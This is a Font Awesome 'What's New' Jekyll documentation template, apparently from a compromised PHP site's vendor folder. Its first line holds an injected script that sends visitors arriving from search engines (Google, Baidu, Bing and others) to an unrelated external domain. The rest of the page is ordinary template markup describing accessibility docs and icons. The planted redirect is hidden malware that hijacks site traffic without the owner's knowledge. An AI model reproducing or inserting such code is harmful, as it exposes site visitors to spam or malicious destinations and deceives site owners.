d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\whats-new.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>---
002: layout: base
003: title: What's New
004: navbar_active: whats-new
005: relative_path: ../
006: ---
007: {% capture jumbotron_h1 %}<i class="fa fa-lightbulb-o" aria-hidden="true"></i>&nbsp; What's New{% endcapture %}
008: {% capture jumbotron_p %}What's New in the latest version &mdash; Font Awesome {{ site.fontawesome.minor_version }}{% endcapture %}
009:
010: {% include jumbotron.html %}
011: {% include stripe-social.html %}
012:
013: <div class="container">
014:   {% capture stripe_ad_content %}
015:   <p class="lead">
016:     Font Awesome is always getting a little awesome-er. So here's what's new in the latest version, Font Awesome
017:     {{ site.fontawesome.minor_version }}. Have some ideas for new features?
018:     <a href="{{ page.relative_path }}community/">Help contribute</a>.
019:   </p>
020:   {% endcapture %}
021:   {% include stripe-ad.html %}
022:
023:   <div class="row feature-list">
024:     <div class="col-md-4 col-sm-6">
025:       <h4><i class="fa fa-universal-access" aria-hidden="true"></i> <a href="{{ page.relative_path }}accessibility">Accessibility Docs</a></h4>
026:       Details on how to mark up your icons depending on how you're using them.
027:       Make your site icons usable by the most people, and start here.
028:     </div>
029:     <div class="col-md-4 col-sm-6">
030:       <h4><i class="fa fa-code" aria-hidden="true"></i> Better Examples</h4>
031:       Every FA icon example page now has a better, more accessibility-minded
032:       default block of code that users can copy and paste.
033:     </div>
034:     <div class="col-md-4 col-sm-6">
035:       <h4><i class="fa fa-wheelchair-alt" aria-hidden="true"></i> <a href="{{ page.relative_path }}icons/#accessibility">Accessibility Category</a></h4>
036:       We've added a new icon category specifically for accessibility and seeded
037:       it with 15 icons to start. Make sure to <a href="{{ page.relative_path }}community/#requesting-new-icons">request more</a> if you need them!
038:     </div>
039:   </div>
040:
041:   {% include icons/new.html %}
042:   {% include new-upgrading.html %}
043: </div>
044:
045:
046: